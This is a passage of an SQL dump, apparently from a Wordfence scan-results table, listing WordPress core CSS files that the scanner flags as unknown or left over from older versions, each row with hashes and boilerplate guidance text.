More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/customize-preview-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26822,1631424876,1631424876,'new','knownfile',75,'f7d25d0debc889e3f087dd2dfb32f885','41a55dc6cbbb5c3805178e34aca24bf0','Unknown file in WordPress core: wp-includes/wp-includes/css/customize-preview.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/css/customize-preview.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26823,1631424876,1631424876,'new','knownfile',75,'6619318ea9d7432f9041fca658e0c7c1','0ef3f969331d088be30f69353d9ba643','Unknown file in WordPress core: wp-includes/wp-includes/css/customize-preview.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/customize-preview.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26824,1631424876,1631424876,'new','knownfile',75,'62862de32af2621c5ed6d57affbb41c6','818035408368ea6b567fd9ce9a8ec87a','Unknown file in WordPress core: wp-includes/wp-includes/css/dashicons.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/css/dashicons.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26825,1631424876,1631424876,'new','knownfile',75,'a5c74d8b0bdc9cfe6bcff1e804f35246','a75fb48b5eb1c3bbf3bf04e37b845f25','Unknown file in WordPress core: wp-includes/wp-includes/css/dashicons.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/css/dashicons.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26826,1631424876,1631424876,'new','knownfile',75,'dbf615036b8c9e2020f9051375c87963','dae3f7444f2bc9e9640546f05df65132','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-directory/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/css/dist/block-directory/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26827,1631424876,1631424876,'new','knownfile',75,'3c06f92cce51558f2e5da443103414d4','f0ca77de528f00009bc24aeb1202fd40','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-directory/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/css/dist/block-directory/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26828,1631424876,1631424876,'new','knownfile',75,'430218750aa8f04753ef80cc063b0b82','53a51e19d65000663ebb532381697816','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-directory/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/css/dist/block-directory/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26829,1631424877,1631424877,'new','knownfile',75,'f1842805a66772a97cc72a3eb0bf110b','beb5f032f6692801f98378c38c14bb82','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-directory/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/css/dist/block-directory/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26830,1631424877,1631424877,'new','knownfile',75,'a84918bb72be7a31b119348b031deda5','e93cd45981d31648d3799bd755fe6fb1','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-editor/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/css/dist/block-editor/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26831,1631424877,1631424877,'new','knownfile',75,'6c0e732d55b7d2ceeda615759d9c64e7','5843cdb3575abea326b66b67f39ef87a','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-editor/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/css/dist/block-editor/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26832,1631424877,1631424877,'new','knownfile',75,'ccfd0beea85c1088bcb39c389df2f7a6','94389adcd9aa383d2a92e8861d88db84','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-editor/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/css/dist/block-editor/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26833,1631424877,1631424877,'new','knownfile',75,'d847dee81f035926112fa212154bf621','7dee631f940823fa10c71c2dcc3376da','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-editor/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/css/dist/block-editor/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26834,1631424877,1631424877,'new','knownfile',75,'ca4b6e8dafaeb712aa0a38f222275b41','f34717243782ada4a10b3a20c1bf2fb2','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/common-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/block-library/common-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26835,1631424877,1631424877,'new','knownfile',75,'d6a57fa7384420b1cee65b3c11613555','868baf690d325a0f8f1ad322a83fe73b','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/common-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/css/dist/block-library/common-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26836,1631424877,1631424877,'new','knownfile',75,'12f1a252a34c7f2147f7abf0b47b9583','760b3ffb39abaeab158ca34336a4778d','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/common.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/block-library/common.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26837,1631424877,1631424877,'new','knownfile',75,'43d83f21658dc22ff2a2a2cf16a702f3','03132b8b0188298d7112a9f3e9c08f5b','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/common.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/block-library/common.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26838,1631424877,1631424877,'new','knownfile',75,'3dde8674acabcf989c6453fb8405e63b','8e59a6fdba73fb8f4136c4c8b64e350b','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/editor-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/block-library/editor-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26839,1631424877,1631424877,'new','knownfile',75,'e4e0753b1a96881ebb00bffd10b032d2','b31e9701b4d9ee3393ea6ad64ea27fbb','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/editor-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/css/dist/block-library/editor-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26840,1631424877,1631424877,'new','knownfile',75,'659d269ba20d3de17a45729c4423fc2b','0d61aaf2dcd5a0110081c3f20e90202f','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/editor.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/block-library/editor.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26841,1631424877,1631424877,'new','knownfile',75,'79889ff7fa3cbe21f91c68b39b5cb6b0','0a535559ef9fbf114b40200168cdfb8e','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/editor.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/block-library/editor.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26842,1631424877,1631424877,'new','knownfile',75,'aca0e15a1fcd7309ff4d0c1b56e6a9c7','7ec45622731f3a708518ffc016364e79','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/css/dist/block-library/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26843,1631424877,1631424877,'new','knownfile',75,'7095aaf94b04bbe1e197a0a0a9be1262','7dad73920cfaf111bb8858cab3e84d98','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/css/dist/block-library/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26844,1631424878,1631424878,'new','knownfile',75,'982e45d54f801196f6a37b5dbfdfd22e','b0a01292780f2a9d1345f6dee66718a5','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/css/dist/block-library/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26845,1631424878,1631424878,'new','knownfile',75,'618d344873f111c2fabaf3272b785391','4ec8a56527718ae1366f1a190066d688','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/css/dist/block-library/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26846,1631424878,1631424878,'new','knownfile',75,'1e3aa1dca063663f7159b8c59381258c','bae4bca4d74854353c8e1f67438163b1','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/theme-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/css/dist/block-library/theme-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26847,1631424878,1631424878,'new','knownfile',75,'b84c0778ec182f99bde295f7f14b65c2','1b346f3921487d2701b64bc04f6867fd','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/theme-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/css/dist/block-library/theme-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26848,1631424878,1631424878,'new','knownfile',75,'5885fe7aea535ab089341f106e3f5b24','c24a9ebe1763abd4569d9b36c0870f23','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/theme.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/css/dist/block-library/theme.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26849,1631424878,1631424878,'new','knownfile',75,'b8837a9c1fe952cbcd264ccb6d0dae9b','f618dac3581d7b9770a25ef52088b493','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/theme.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/css/dist/block-library/theme.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26850,1631424878,1631424878,'new','knownfile',75,'88eb3d8aae5ba58228667c8b0c1711b3','850b02a1e21b452880bfb22f90161b65','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/components/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/components/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26851,1631424878,1631424878,'new','knownfile',75,'099f7797343748173a6730ddebe8c5a3','6595a907e9e25b0eaf00c6c6c8db8840','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/components/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/components/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26852,1631424878,1631424878,'new','knownfile',75,'864599f11818045bcffe987767893ddf','e79fe1de83cb063952a813d0a183a66e','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/components/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/dist/components/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26853,1631424878,1631424878,'new','knownfile',75,'b28e1618030d06a460640d5d41161988','23a452e4275b5ae22a01a050916f654a','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/components/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/components/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26854,1631424878,1631424878,'new','knownfile',75,'dfe01b85bebfdc77e47fc3a473117c99','e010118a560da8323bd1ecf324113af6','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/edit-post/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/css/dist/edit-post/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26855,1631424878,1631424878,'new','knownfile',75,'49cf8f22fc88854a7e4223c8f1ddd03c','6756ff29be04601696f456bf46873b78','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/edit-post/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/css/dist/edit-post/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26856,1631424878,1631424878,'new','knownfile',75,'bb79e97ad2c80919252b83b4aadbfe4c','9b7675a2af63d4e699bd2b3aab28f444','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/edit-post/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/css/dist/edit-post/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26857,1631424878,1631424878,'new','knownfile',75,'14f9635cf7f7c4df255dfb8808cd05ab','9804a92e9b5b28b04fd8a85f81ccb94a','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/edit-post/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/css/dist/edit-post/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26858,1631424879,1631424879,'new','knownfile',25,'2c0724e10a7fbe3aa5110e5079fb397c','a6e5c4c3c87db2d381281439e9a0402a','Old WordPress core file not removed during update: wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.css','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26859,1631424879,1631424879,'new','knownfile',25,'cc4149e853f0eda0743883792383841d','83a884b0b6fd5faed7b2e2b612007cfe','Old WordPress core file not removed during update: wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.min.css','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26860,1631424879,1631424879,'new','knownfile',25,'8200247f971138f765517b8982c0e027','a847f74bcb1028b4b959474edf621fe4','Old WordPress core file not removed during update: wp-includes/wp-includes/css/dist/editor/editor-styles.css','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/editor/editor-styles.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26861,1631424879,1631424879,'new','knownfile',25,'6ae70aa028d1da45b610694fd0d94813','5fd2ebc5cf7d580dd6fcfe2bb52f3ca5','Old WordPress core file not removed during update: wp-includes/wp-includes/css/dist/editor/editor-styles.min.css','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/editor/editor-styles.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26862,1631424879,1631424879,'new','knownfile',75,'3457d93b88728955ad8eb8d8c08003ea','ab57a0886aa736a5a30d178fa398e06b','Unknown 